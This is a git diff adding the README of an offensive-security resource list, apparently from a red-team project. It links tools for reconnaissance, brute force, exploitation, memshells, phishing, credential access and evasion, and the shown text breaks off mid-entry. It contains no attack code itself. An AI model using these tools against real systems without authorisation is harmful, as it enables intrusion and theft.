diff --git a/README.md b/README.md new file mode 100644 index 0000000..7b898eb --- /dev/null +++ b/README.md @@ -0,0 +1,1288 @@ +# Awesome-Redteam + +**【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 [法律法规](https://github.com/Threekiii/Awesome-Laws)。** + +## _Roadmap_ + +![](images/README/Awesome-Redteam-20241106.png) + +## 目录 _Contents_ + +- [项目导航 _Project Navigation_](#%E9%A1%B9%E7%9B%AE%E5%AF%BC%E8%88%AA-project-navigation) + - [速查文档 _CheatSheets_](#%E9%80%9F%E6%9F%A5%E6%96%87%E6%A1%A3-cheatsheets) + - [一些代码 _Scripts_](#%E4%B8%80%E4%BA%9B%E4%BB%A3%E7%A0%81-scripts) + - [攻防知识 _Tips_](#%E6%94%BB%E9%98%B2%E7%9F%A5%E8%AF%86-tips) +- [开源导航 _Open-Source Navigation_](#%E5%BC%80%E6%BA%90%E5%AF%BC%E8%88%AA-open-source-navigation) + - [编解码/加解密 _Cryptography_](#%E7%BC%96%E8%A7%A3%E7%A0%81%E5%8A%A0%E8%A7%A3%E5%AF%86-cryptography) + - [威胁情报 _Threat Intelligence_](#%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5-threat-intelligence) + - [网络空间测绘 _Cyberspace Search Engine_](#%E7%BD%91%E7%BB%9C%E7%A9%BA%E9%97%B4%E6%B5%8B%E7%BB%98-cyberspace-search-engine) + - [开源情报 _Open-Source Intelligence_](#%E5%BC%80%E6%BA%90%E6%83%85%E6%8A%A5-open-source-intelligence) + - [攻防相关 _Offensive Security_](#%E6%94%BB%E9%98%B2%E7%9B%B8%E5%85%B3-offensive-security) + - [漏洞相关 _Vulnerabilities_](#%E6%BC%8F%E6%B4%9E%E7%9B%B8%E5%85%B3-vulnerabilities) + - [社区/知识库 _Open-Source Resources_](#%E7%A4%BE%E5%8C%BA%E7%9F%A5%E8%AF%86%E5%BA%93-open-source-resources) + - [工具集 _Open-Source Toolkit_](#%E5%B7%A5%E5%85%B7%E9%9B%86-open-source-toolkit) +- [信息收集 _Reconnaissance_](#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-reconnaissance) + - [综合工具 _Nice Tools_](#%E7%BB%BC%E5%90%88%E5%B7%A5%E5%85%B7-nice-tools) + - [IP/域名/子域名 _IP/Domain/Subdomain_](#ip%E5%9F%9F%E5%90%8D%E5%AD%90%E5%9F%9F%E5%90%8D-ipdomainsubdomain) + - [指纹识别 _Fingerprint_](#%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB-fingerprint) + - [扫描/爆破 _Brute Force_](#%E6%89%AB%E6%8F%8F%E7%88%86%E7%A0%B4-brute-force) + - [扫描/爆破工具 _Brute Force Tools_](#%E6%89%AB%E6%8F%8F%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7-brute-force-tools) + - [扫描/爆破字典 _Brute Force Dictionaries_](#%E6%89%AB%E6%8F%8F%E7%88%86%E7%A0%B4%E5%AD%97%E5%85%B8-brute-force-dictionaries) + - [字典生成 _Generate a Custom Dictionary_](#%E5%AD%97%E5%85%B8%E7%94%9F%E6%88%90-generate-a-custom-dictionary) + - [默认口令查询 _Default Credentials_](#%E9%BB%98%E8%AE%A4%E5%8F%A3%E4%BB%A4%E6%9F%A5%E8%AF%A2-default-credentials) + - [社会工程学 _Social Engineering_](#%E7%A4%BE%E4%BC%9A%E5%B7%A5%E7%A8%8B%E5%AD%A6-social%C2%A0engineering) + - [凭据泄露 _Leaked Credentials_](#%E5%87%AD%E6%8D%AE%E6%B3%84%E9%9C%B2-leaked-credentials) + - [邮箱 _Email_](#%E9%82%AE%E7%AE%B1-email) + - [短信 _SMS_](#%E7%9F%AD%E4%BF%A1-sms) + - [钓鱼 _Phishing_](#%E9%92%93%E9%B1%BC-phishing) + - [移动端 _Mobile_](#%E7%A7%BB%E5%8A%A8%E7%AB%AF-mobile) +- [漏洞研究 _Vulnerability Research_](#%E6%BC%8F%E6%B4%9E%E7%A0%94%E7%A9%B6-vulnerability-research) + - [漏洞环境 _Vulnerable Environments_](#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-vulnerable-environments) + - [PoC _Proof of Concept_](#poc-proof-of-concept) +- [漏洞利用 _Exploits_](#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-exploits) + - [综合工具 _Nice Tools_](#%E7%BB%BC%E5%90%88%E5%B7%A5%E5%85%B7-nice-tools) + - [反序列化 _Deserialization_](#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-deserialization) + - [代码审计 _Code Audit_](#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-code-audit) + - [数据库 _Database_](#%E6%95%B0%E6%8D%AE%E5%BA%93-database) + - [信息泄露 _Information Disclosure_](#%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2-information-disclosure) + - [_CMS/OA_](#cmsoa) + - [中间件/应用层 _Middleware/Application_](#%E4%B8%AD%E9%97%B4%E4%BB%B6%E5%BA%94%E7%94%A8%E5%B1%82-middlewareapplication) +- [渗透测试 _Penertation Testing_](#%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-penertation-testing) + - [综合工具 _Nice Tools_](#%E7%BB%BC%E5%90%88%E5%B7%A5%E5%85%B7-nice-tools) + - [_Web_](#web) + - [_DNSLog_](#dnslog) + - [_Payload and Bypass_](#payload-and-bypass) +- [内网渗透 _Red Teaming_](#%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F-red-teaming) + - [凭证获取 _Credential Access_](#%E5%87%AD%E8%AF%81%E8%8E%B7%E5%8F%96-credential-access) + - [后渗透 _Post Exploitation_](#%E5%90%8E%E6%B8%97%E9%80%8F-post-exploitation) + - [权限提升 _Privilege Escalation_](#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-privilege-escalation) + - [权限维持 _Persistence_](#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-persistence) + - [防御规避 _Defense Evasion_](#%E9%98%B2%E5%BE%A1%E8%A7%84%E9%81%BF-defense-evasion) + - [内网穿透 _Proxy_](#%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F-proxy) + - [端口转发 _Port Forwarding_](#%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91-port-forwarding) + - [辅助工具 _Auxiliary Tools_](#%E8%BE%85%E5%8A%A9%E5%B7%A5%E5%85%B7-auxiliary-tools) +- [域渗透 _Active Directory Penetration_](#%E5%9F%9F%E6%B8%97%E9%80%8F-active-directory-penetration) + - [开源资源 _Resources_](#%E5%BC%80%E6%BA%90%E8%B5%84%E6%BA%90-resources) + - [域内信息收集 Collection and Discovery](#%E5%9F%9F%E5%86%85%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-collection-and-discovery) + - [域内已知漏洞 _Known Vulnerabilities_](#%E5%9F%9F%E5%86%85%E5%B7%B2%E7%9F%A5%E6%BC%8F%E6%B4%9E-known-vulnerabilities) + - [域内渗透方式 Methodology](#%E5%9F%9F%E5%86%85%E6%B8%97%E9%80%8F%E6%96%B9%E5%BC%8F-methodology) + - [ADCS _Active Directory Certificate Services_](#adcs-active-directory-certificate-services) +- [安全防护 _Defensive Security_](#%E5%AE%89%E5%85%A8%E9%98%B2%E6%8A%A4-defensive-security) + - [内存马查杀 _Memshell Detection_](#%E5%86%85%E5%AD%98%E9%A9%AC%E6%9F%A5%E6%9D%80-memshell-detection) + - [Webshell 查杀 _Webshell Detection_](#webshell-%E6%9F%A5%E6%9D%80-webshell-detection) + - [攻击研判 _Blue Teaming_](#%E6%94%BB%E5%87%BB%E7%A0%94%E5%88%A4-blue-teaming) + - [基线加固 _Enforcement_](#%E5%9F%BA%E7%BA%BF%E5%8A%A0%E5%9B%BA-enforcement) + - [勒索病毒 _Ransomware_](#%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92-ransomware) + - [开源蜜罐 _Open-Source Honeypot_](#%E5%BC%80%E6%BA%90%E8%9C%9C%E7%BD%90-open-source-honeypot) +- [云安全 _Cloud Security_](#%E4%BA%91%E5%AE%89%E5%85%A8-cloud-security) + - [开源资源 _Resources_](#%E5%BC%80%E6%BA%90%E8%B5%84%E6%BA%90-resources) + - [云安全矩阵 _Cloud Threat Matrix_](#%E4%BA%91%E5%AE%89%E5%85%A8%E7%9F%A9%E9%98%B5-cloud-threat-matrix) + - [云漏洞环境 _Vulnerable Cloud Environments_](#%E4%BA%91%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-vulnerable-cloud-environments) + - [云服务 _Cloud Services_](#%E4%BA%91%E6%9C%8D%E5%8A%A1-cloud-services) + - [云原生 _Cloud Native_](#%E4%BA%91%E5%8E%9F%E7%94%9F-cloud-native) +- [AI 安全 _AI Security_](#ai-%E5%AE%89%E5%85%A8-ai-security) + - [AI 安全矩阵 _AI Threat Matrix_](#ai-%E5%AE%89%E5%85%A8%E7%9F%A9%E9%98%B5-ai-threat-matrix) +- [移动端安全 _Mobile Security_](#%E7%A7%BB%E5%8A%A8%E7%AB%AF%E5%AE%89%E5%85%A8-mobile-security) + - [小程序 _Mini Program_](#%E5%B0%8F%E7%A8%8B%E5%BA%8F-mini-program) + - [_APK_](#apk) + - [_SessionKey_](#sessionkey) +- [逆向工程 _Reverse engineering_](#%E9%80%86%E5%90%91%E5%B7%A5%E7%A8%8B-reverse-engineering) +- [提高生产力的辅助工具](#%E6%8F%90%E9%AB%98%E7%94%9F%E4%BA%A7%E5%8A%9B%E7%9A%84%E8%BE%85%E5%8A%A9%E5%B7%A5%E5%85%B7) + - [_Shell_](#shell) + - [_Chrome Extensions_](#chrome-extensions) + - [_Infrastructure_](#infrastructure) + - [_LLM_](#llm) + - [开源资源 _Open-Source Resources_](#%E5%BC%80%E6%BA%90%E8%B5%84%E6%BA%90-open-source-resources) + - [提示词 _Prompts_](#%E6%8F%90%E7%A4%BA%E8%AF%8D-prompts) + - [部署 _Deployment_](#%E9%83%A8%E7%BD%B2-deployment) +- [提高生产力的使用姿势](#%E6%8F%90%E9%AB%98%E7%94%9F%E4%BA%A7%E5%8A%9B%E7%9A%84%E4%BD%BF%E7%94%A8%E5%A7%BF%E5%8A%BF) + - [如何通过 .bat 使用 alias](#%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87-bat-%E4%BD%BF%E7%94%A8-alias) + - [如何通过.bat 激活 conda 并运行 py](#%E5%A6%82%E4%BD%95%E9%80%9A%E8%BF%87bat-%E6%BF%80%E6%B4%BB-conda-%E5%B9%B6%E8%BF%90%E8%A1%8C-py) + - [如何优化原生终端](#%E5%A6%82%E4%BD%95%E4%BC%98%E5%8C%96%E5%8E%9F%E7%94%9F%E7%BB%88%E7%AB%AF) + - [如何解决终端中文乱码](#%E5%A6%82%E4%BD%95%E8%A7%A3%E5%86%B3%E7%BB%88%E7%AB%AF%E4%B8%AD%E6%96%87%E4%B9%B1%E7%A0%81) + +## 项目导航 _Project Navigation_ + +### 速查文档 _CheatSheets_ + +戳这里 [Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/cheatsheets/) + +``` +DefaultCreds-Cheat-Sheet.csv +Huawei-iBMC-DefaultCreds.csv +Huawei-Product-Cheat-Sheet.csv +WeakPassword-Cheat-Sheet.csv +安全厂商及官网链接速查.txt +``` + +### 一些代码 _Scripts_ + +戳这里 [Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/scripts/) + +``` +ShellcodeWrapper: Shellcode加密 +AntivirusScanner: 杀软进程检测脚本 +runtime-exec-payloads.html: java.lang.Runtime.exec() Payloads生成 +Ascii2Char: ASCII码和字符互相转换脚本 修改webshell文件名密码 +Weakpass_Generator: 在线弱密码生成工具 汉化版 +Godzilla_Decryptor: 哥斯拉流量解密 +Behinder4_Key_Bruteforce: 冰蝎4密钥爆破 +Flask_Session_Decryptor: Flask session注入解密 +``` + +### 攻防知识 _Tips_ + +戳这里 [Click Here](https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/) + +``` +信息收集-敏感信息收集 +内网渗透-免杀 +内网渗透-隐藏 +内网渗透-Pentesting AD Mindmap +安全架构-网络攻击与防御图谱 +平台搭建-DNS Log +流量分析-CobaltStrike +流量分析-Webshell +社会工程学-钓鱼邮件主题汇总 +逆向分析-微信小程序反编译 +``` + +## 开源导航 _Open-Source Navigation_ + +### 编解码/加解密 _Cryptography_ + +- Online: + - http://www.ip33.com/ + - https://evilcos.me/lab/xssee/ + - http://www.metools.info/ + - https://www.107000.com/ + - https://github.com/wangyiwy/oktools + - http://www.hiencode.com/ + - http://www.atoolbox.net/ + - https://www.sojson.com/ + - https://the-x.cn/ +- Offline: + - https://github.com/Ciphey/Ciphey + - https://github.com/gchq/CyberChef + - http://1o1o.xyz/bo_ctfcode.html + - https://github.com/guyoung/CaptfEncoder +- Encode/Decode: + - http://code.mcdvisa.com/ GB2312 + - https://www.compart.com/en/unicode/ Unicode + - http://web.chacuo.net/charsetuuencode UUencode + - https://tool.chinaz.com/tools/escape.aspx Escape/Unescape + - https://zh.rakko.tools/tools/21/ HTML Entity Encode +- Regular Expressions: + - https://regex101.com/ + - https://github.com/VincentSit/ChinaMobilePhoneNumberRegex + - https://github.com/any86/any-rule +- Hash: + - https://www.cmd5.org/ + - https://www.somd5.com/ + - https://www.onlinehashcrack.com/ + - https://crackstation.net/ + - https://crack.sh/ + - https://passwordrecovery.io/ + - https://md5decrypt.net/en/Sha256/ + - https://hashes.com/en/decrypt/hash +- RSA: + - https://www.ssleye.com/ssltool/ + - https://www.lddgo.net/en/encrypt/rsa works with .pem + +### 威胁情报 _Threat Intelligence_ + +- Virustotal: https://www.virustotal.com/ +- 腾讯哈勃分析系统: https://habo.qq.com/tool/index +- 微步在线威胁情报: https://x.threatbook.com/ +- 奇安信威胁情报: https://ti.qianxin.com/ +- 360 威胁情报: https://ti.360.net/ +- 网络安全威胁信息共享平台: https://share.anva.org.cn/web/publicity/listPhishing +- 安恒威胁情报: https://ti.dbappsecurity.com.cn/ +- 火线安全平台: https://www.huoxian.cn +- 知道创宇黑客新闻流: https://hackernews.cc/ +- SecWiki 安全信息流: https://www.sec-wiki.com/ + +### 网络空间测绘 _Cyberspace Search Engine_ + +- Fofa: https://fofa.info/ +- Shodan: https://www.shodan.io/ +- ZoomEye: https://www.zoomeye.org/ +- Hunter: https://hunter.qianxin.com/ +- Ditecting: https://www.ditecting.com/ +- Quake: https://quake.360.cn/quake/ +- Censys: https://search.censys.io/ +- Netlas: https://app.netlas.io/domains/ +- Wayback Machine: https://web.archive.org/ web pages saved over time +- VisualPing: https://visualping.io/ website changes monitor +- Dark Web Exposure: https://www.immuniweb.com/darkweb/ +- SG TCP/IP: https://www.speedguide.net/ports.php ports database +- Google Hacking Database: + - https://www.exploit-db.com/google-hacking-database + - https://github.com/cipher387/Dorks-collections-list + - https://cxsecurity.com/dorks/ +- Google Hacking Online: + - https://dorks.faisalahmed.me/ + - https://pentest-tools.com/information-gathering/google-hacking + - http://advangle.com/ + - https://0iq.me/gip/ +- Google Hacking Cli: + - https://github.com/obheda12/GitDorker + - https://github.com/six2dez/dorks_hunter +- Github Dork: + - https://github.com/search/advanced + - https://github.com/obheda12/GitDorker + - https://github.com/damit5/gitdorks_go + +### 开源情报 _Open-Source Intelligence_ + +- OSINT Resource List: https://start.me/p/rx6Qj8/nixintel-s-osint-resource-list +- OSINT Framework: https://osintframework.com/ +- OSINT Handbook: https://i-intelligence.eu/uploads/public-documents/OSINT_Handbook_2020.pdf +- Public APIs: + - https://www.postman.com/explore/ + - https://rapidapi.com/ +- Discover Secret API keys: https://serene-agnesi-57a014.netlify.app/ +- Source Code Search Engine: + - https://publicwww.com/ + - https://searchcode.com/ + +### 攻防相关 _Offensive Security_ + +- Red Teaming and Offensive Security: + - https://www.ired.team/ + - https://www.thehacker.recipes/ + - https://ppn.snovvcrash.rocks/ + - https://book.hacktricks.xyz/ + - https://blog.harmj0y.net/ + - https://hausec.com/domain-penetration-testing/ + - https://dirkjanm.io/ + - https://casvancooten.com/ + - https://evasions.checkpoint.com/ + - https://redteam.guide/docs/definitions + - https://github.com/HadessCS/Red-team-Interview-Questions +- Blue Teaming and Defensive Security: + - https://github.com/Purp1eW0lf/Blue-Team-Notes +- Operation Security: + - https://github.com/WesleyWong420/OPSEC-Tradecraft + +### 漏洞相关 _Vulnerabilities_ + +- 国内信息披露平台: + - 国家信息安全漏洞库: https://www.cnnvd.org.cn/ + - 国家互联网应急中心: https://www.cert.org.cn/ + - 360 网络安全响应中心: https://cert.360.cn/ + - 知道创宇漏洞库: https://www.seebug.org/ + - 长亭漏洞库: https://stack.chaitin.com/vuldb/ + - 阿里云漏洞库: https://avd.aliyun.com/high-risk/list + - PeiQi 漏洞库: https://peiqi.wgpsec.org/ +- 国外信息披露平台: + - https://www.hackerone.com/ + - https://cve.mitre.org/ + - https://nvd.nist.gov/ + - https://www.rapid7.com/db/ + - https://packetstormsecurity.com/files/tags/exploit + - https://github.com/trickest/cve + - https://cvedb.shodan.io/cves stay updated with CVEs `curl https://cvedb.shodan.io/cves | jq '[.cves[] | select(.cvss > 8)]'` +- Exploits 搜索引擎: + - https://sploitus.com/ + - https://www.exploit-db.com/ works with `searchsploit ` + +### 社区/知识库 _Open-Source Resources_ + +- 先知社区: https://xz.aliyun.com/ +- Infocon: https://infocon.org/ +- ffffffff0x 安全知识框架: https://github.com/ffffffff0x/1earn +- 狼组公开知识库: https://wiki.wgpsec.org/ +- Mitre ATT&CK: + - matrices: https://attack.mitre.org/matrices/enterprise + - techniques: http://attack.mitre.org/techniques/enterprise/ +- Hacking Articles: https://www.hackingarticles.in/ +- PostSwigger Blog: https://portswigger.net/blog +- InGuardians Labs Blog: https://www.inguardians.com/ +- Pentest Workflow: https://pentest.mxhx.org/ +- Pentest Cheatsheet: https://pentestbook.six2dez.com/ +- Programming/Toolkit/Command/OS/Shortcuts Cheatsheets: + - https://cheatsheets.zip/ + - https://learnxinyminutes.com/ +- Cyber Security Mindmap: https://github.com/Ignitetechnologies/Mindmap/ + +### 工具集 _Open-Source Toolkit_ + +- NICE Tools: + - https://forum.ywhack.com/bountytips.php?tools + - https://github.com/knownsec/404StarLink + - https://pentest-tools.com/ +- Beautifier: + - http://web.chacuo.net/formatsh + - https://beautifier.io/ + - http://jsnice.org/ +- Reverse Shell Generator: + - https://www.revshells.com/ + - https://forum.ywhack.com/reverse-shell/ + - https://tex2e.github.io/reverse-shell-generator/index.html + - https://github.com/0dayCTF/reverse-shell-generator +- File Download Generator: + - https://github.com/r0eXpeR/File-Download-Generator +- Shorten URLs: https://a.f8x.io/ + +## 信息收集 _Reconnaissance_ + +### 综合工具 _Nice Tools_ + +- AlliN: https://github.com/P1-Team/AlliN +- fscan: https://github.com/shadow1ng/fscan +- TscanPlus: https://github.com/TideSec/TscanPlus +- kscan: https://github.com/lcvvvv/kscan +- Kunyu: https://github.com/knownsec/Kunyu +- OneForAll: https://github.com/shmilylty/OneForAll +- ShuiZe: https://github.com/0x727/ShuiZe_0x727 +- FofaX: https://github.com/xiecat/fofax +- Fofa Viewer: https://github.com/wgpsec/fofa_viewer +- ENScan_GO: https://github.com/wgpsec/ENScan_GO +- Amass: https://github.com/owasp-amass/amass + +### IP/域名/子域名 _IP/Domain/Subdomain_ + +- IP: + - https://www.ipuu.net/ + - https://site.ip138.com/ + - https://myip.ms/ + - https://ipwhois.cnnic.net.cn +- Multi Ping: + - https://ping.chinaz.com/ + - https://www.host-tracker.com/ + - https://www.webpagetest.org/ + - https://dnscheck.pingdom.com/ +- IP to Domain: + - https://site.ip138.com/ + - https://x.threatbook.cn/ + - https://www.virustotal.com/ +- Whois: + - https://whois.chinaz.com/ + - https://whois.aliyun.com/ + - https://who.is/ + - https://www.whoxy.com/ +- DNS: + - https://hackertarget.com/find-dns-host-records + - https://dnsdumpster.com + - https://dnsdb.io/zh-cn + - https://centralops.net/co/ + - https://viewdns.info/ + - https://dnsdumpster.com/ + - https://rapiddns.io/ +- ASN: + - https://wq.apnic.net/ + - https://bgp.he.net/ + - https://bgpview.io/ +- TLS/SSL Certificat : + - https://censys.io + - https://crt.sh + +### 指纹识别 _Fingerprint_ + +- Fingerprint Collection: + - https://github.com/r0eXpeR/fingerprint +- Fingerprint Reconnaissance: + - https://github.com/EASY233/Finger + - https://github.com/EdgeSecurityTeam/EHole + - https://github.com/0x727/ObserverWard + - https://github.com/TideSec/TideFinger_Go + - https://github.com/zhzyker/dismap + - https://www.webshell.cc/4697.html + - http://www.yunsee.cn/ online +- Waf Checks: + - https://github.com/stamparm/identYwaf + - https://github.com/EnableSecurity/wafw00f + - https://github.com/MISP/misp-warninglists + +### 扫描/爆破 _Brute Force_ + +#### 扫描/爆破工具 _Brute Force Tools_ + +- Port: + - https://github.com/antirez/hping +- Subdomain: + - https://github.com/projectdiscovery/subfinder + - https://github.com/knownsec/ksubdomain +- Web: + - https://github.com/pingc0y/URLFinder + - https://github.com/s0md3v/Arjun + - https://github.com/OJ/gobuster + - https://github.com/jaeles-project/gospider + - https://github.com/xmendez/wfuzz +- Directory: + - https://github.com/maurosoria/dirsearch + - https://github.com/H4ckForJob/dirmap + - https://github.com/ffuf/ffuf +- Password: + - https://github.com/vanhauser-thc/thc-hydra + - https://github.com/galkan/crowbar supports sshkey and openvpn + - https://github.com/evilsocket/legba/ +- Hash Cracking: + - https://github.com/openwall/john + - https://github.com/hashcat/hashcat + - https://hashcat.net/wiki/doku.php?id=example_hashes hashcat examples + - https://github.com/HashPals/Name-That-Hash hash identifier + - https://github.com/noraj/haiti hash identifier +- Json web token (JWT): + - https://jwt.io/ + - https://github.com/Sjord/jwtcrack + - https://github.com/ticarpi/jwt_tool + - https://github.com/mazen160/jwt-pwn + - https://github.com/brendan-rius/c-jwt-cracker + - https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list + +#### 扫描/爆破字典 _Brute Force Dictionaries_ + +- Wordlists for All: + - https://github.com/danielmiessler/SecLists 46.4k star + - https://github.com/SexyBeast233/SecDictionary + ffuf + - https://github.com/insightglacier/Dictionary-Of-Pentesting + - https://github.com/TheKingOfDuck/fuzzDicts + - https://github.com/gh0stkey/Web-Fuzzing-Box + - https://github.com/a3vilc0de/PentesterSpecialDict + - https://github.com/Bo0oM/fuzz.txt + - https://github.com/assetnote/wordlists + - https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists +- Web Fuzz Wordlists: + - https://github.com/xmendez/wfuzz/tree/master/wordlist + - https://github.com/lutfumertceylan/top25-parameter +- Others (not frequently used): + - https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content + - https://github.com/assetnote/commonspeak2-wordlists/tree/master/wordswithext + - https://github.com/random-robbie/bruteforce-lists + - https://github.com/google/fuzzing/tree/master/dictionaries + - https://github.com/six2dez/OneListForAll + +#### 字典生成 _Generate a Custom Dictionary_ + +- Online: + - Generate wordlists: https://weakpass.com/generate + - Generate subdomains and wordlists: https://weakpass.com/generate/domains + - 汉字转拼音: https://www.aies.cn/pinyin.htm + - 密码猜解: https://www.hacked.com.cn/pass.html +- Private Deployment: + - Generate wordlists(offline): https://github.com/zzzteph/weakpass + - Generate subdomains and wordlists(offline): https://github.com/zzzteph/probable_subdomains +- Offline: + - pydictor: https://github.com/LandGrey/pydictor/ + - crunch: + - Kali/Linux: https://sourceforge.net/projects/crunch-wordlist + - Windows: https://github.com/shadwork/Windows-Crunch + +#### 默认口令查询 _Default Credentials_ + +- Default Credentials Cheat Sheet: https://github.com/ihebski/DefaultCreds-cheat-sheet 3468 default creds +- datarecovery: https://datarecovery.com/rd/default-passwords/ online +- cirt.net: https://cirt.net/passwords online +- Online Router Passwords: + - https://www.routerpasswords.com/ + - https://portforward.com/router-password/ + - https://www.cleancss.com/router-default/ + - https://www.toolmao.com/baiduapp/routerpwd/ + - https://datarecovery.com/rd/default-passwords/ + +### 社会工程学 _Social Engineering_ + +#### 凭据泄露 _Leaked Credentials_ + +- https://have-ibeenpwned.com/ +- https://breachdirectory.org/ + +#### 邮箱 _Email_ + +- Temporary Email: + - http://24mail.chacuo.net/ + - https://www.guerrillamail.com/ + - https://rootsh.com/ +- Snov.io: https://app.snov.io +- Phonebook: also works on subdomains and urls https://phonebook.cz +- Skymem: https://www.skymem.info +- Hunter: https://hunter.io +- email-format: https://www.email-format.com/i/search/ +- 搜邮箱: https://souyouxiang.com/find-contact/ +- theHarvester: also works on subdomains https://github.com/laramies/theHarvester +- Verify emails: https://tools.emailhippo.com/ +- Accounts registered by email: https://emailrep.io/ + +#### 短信 _SMS_ + +- SMS Online: + - https://sms-activate.io 👍 more than 180 countries for sale + - https://www.supercloudsms.com/en/ + - https://getfreesmsnumber.com/ + - https://www.zusms.com/ + - https://yunduanxin.net/ + - https://www.free-sms-receive.com/ + - https://receive-sms.cc/#google_vignette + - https://bestsms.xyz/ + - https://smscodeonline.com/ + +#### 钓鱼 _Phishing_ + +- gophish: https://github.com/gophish/gophish open-source phishing toolkit +- SpoofWeb: https://github.com/5icorgi/SpoofWeb deploy phishing website + +### 移动端 _Mobile_ + +- https://www.xiaolanben.com/ +- https://www.qimai.cn/ + +## 漏洞研究 _Vulnerability Research_ + +### 漏洞环境 _Vulnerable Environments_ + +- Basic: + - Sqli-labs: https://github.com/Audi-1/sqli-labs + - Upload-labs: https://github.com/c0ny1/upload-labs + - Xss-labs: https://github.com/do0dl3/xss-labs + - DVWA: https://github.com/digininja/DVWA + - WebGoat: https://github.com/WebGoat/WebGoat +- Comprehensive: + - Vulhub: https://vulhub.org/ + - ichunqiu: https://yunjing.ichunqiu.com/ + - HackTheBox: https://www.hackthebox.com/ + - OWASP Top10: https://owasp.org/www-project-juice-shop/ + - Vulstudy: https://github.com/c0ny1/vulstudy 17 platform based on docker + - Vulfocus: https://github.com/fofapro/vulfocus +- IoT: + - IoT-vulhub: https://github.com/firmianay/IoT-vulhub +- Others: + - FastJsonParty: https://github.com/lemono0/FastJsonParty + +### PoC _Proof of Concept_ + +> Be careful Malware,POC 库最新的 CVE 可能存在投毒风险。 + +- PoC: + - https://github.com/wy876/POC + - https://github.com/lal0ne/vulnerability + - https://github.com/DawnFlame/POChouse + - https://github.com/coffeehb/Some-PoC-oR-ExP + - https://github.com/luck-ying/Library-POC + - https://github.com/Mr-xn/Penetration_Testing_POC + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/helloexp/0day +- PoC templates: + - https://poc.xray.cool/ online + - https://github.com/zeoxisca/gamma-gui offline + - https://github.com/projectdiscovery/nuclei-templates/ + +## 漏洞利用 _Exploits_ + +### 综合工具 _Nice Tools_ + +- https://github.com/chaitin/xpoc +- https://github.com/chaitin/xray +- https://github.com/zhzyker/vulmap +- https://github.com/zan8in/afrog +- https://github.com/projectdiscovery/nuclei + +### 反序列化 _Deserialization_ + +- Java: + - https://github.com/frohoff/ysoserial + - https://github.com/mbechler/marshalsec + - https://github.com/qi4L/JYso + - https://github.com/welk1n/JNDI-Injection-Exploit + - https://github.com/WhiteHSBG/JNDIExploit + - https://github.com/rebeyond/JNDInjector + - https://github.com/A-D-Team/attackRmi +- php: + - https://github.com/ambionics/phpggc +- Mysql jdbc: + - https://github.com/4ra1n/mysql-fake-server + - https://github.com/dushixiang/evil-mysql-server + - https://github.com/fnmsd/MySQL_Fake_Server + +### 代码审计 _Code Audit_ + +- tabby: https://github.com/wh1t3p1g/tabby + +### 数据库 _Database_ + +- Redis GUI Client: + - https://github.com/cinience/RedisStudio + - https://github.com/qishibo/AnotherRedisDesktopManager +- Redis RCE: + - https://github.com/n0b0dyCN/redis-rogue-server + - https://github.com/Ridter/redis-rce + - https://github.com/yuyan-sec/RedisEXP + - https://github.com/r35tart/RedisWriteFile +- MDUT: https://github.com/SafeGroceryStore/MDUT multiple database utilization tools +- Oracle: + - odat: https://github.com/quentinhardy/odat RCE + - sqlplus: https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html xxx as sysdba +- MSSQL: + - https://github.com/Ridter/PySQLTools + +### 信息泄露 _Information Disclosure_ + +- GitHack(py3): https://github.com/lijiejie/GitHack .git folder disclosure exploit +- GitHack(py2 or upgrade the code): https://github.com/BugScanTeam/GitHack .git folder disclosure exploit(recommand) +- dvcs-ripper: https://github.com/kost/dvcs-ripper .svn、.hg、.cvs disclosure +- ds_store_exp: https://github.com/lijiejie/ds_store_exp .DS_Store disclosure +- Hawkeye: https://github.com/0xbug/Hawkeye gitHub sensitive information leakage monitor Spider + +### _CMS/OA_ + +- TongdaScan_go https://github.com/Fu5r0dah/TongdaScan_go +- Apt_t00ls: https://github.com/White-hua/Apt_t00ls +- OA-EXPTOOL: https://github.com/LittleBear4/OA-EXPTOOL +- DecryptTools: https://github.com/wafinfo/DecryptTools 22 种加解密 +- ncDecode: https://github.com/1amfine2333/ncDecode 用友 NC 解密 +- PassDecode-jar: https://github.com/Rvn0xsy/PassDecode-jar 帆软/致远解密 +- ezOFFICE_Decrypt: https://github.com/wafinfo/ezOFFICE_Decrypt 万户解密 +- LandrayDES: https://github.com/zhutougg/LandrayDES 蓝凌 OA 解密 + +### 中间件/应用层 _Middleware/Application_ + +- Confluence: + - ConfluenceMemshell: https://github.com/Lotus6/ConfluenceMemshell + - CVE-2022-26134 Memshell: https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL + - CVE-2023-22527 Memshell: https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL +- Druid: + - DruidCrack: https://github.com/rabbitmask/DruidCrack + - druid_sessions: https://github.com/yuyan-sec/druid_sessions +- Fastjson: + - fastjson-exp: 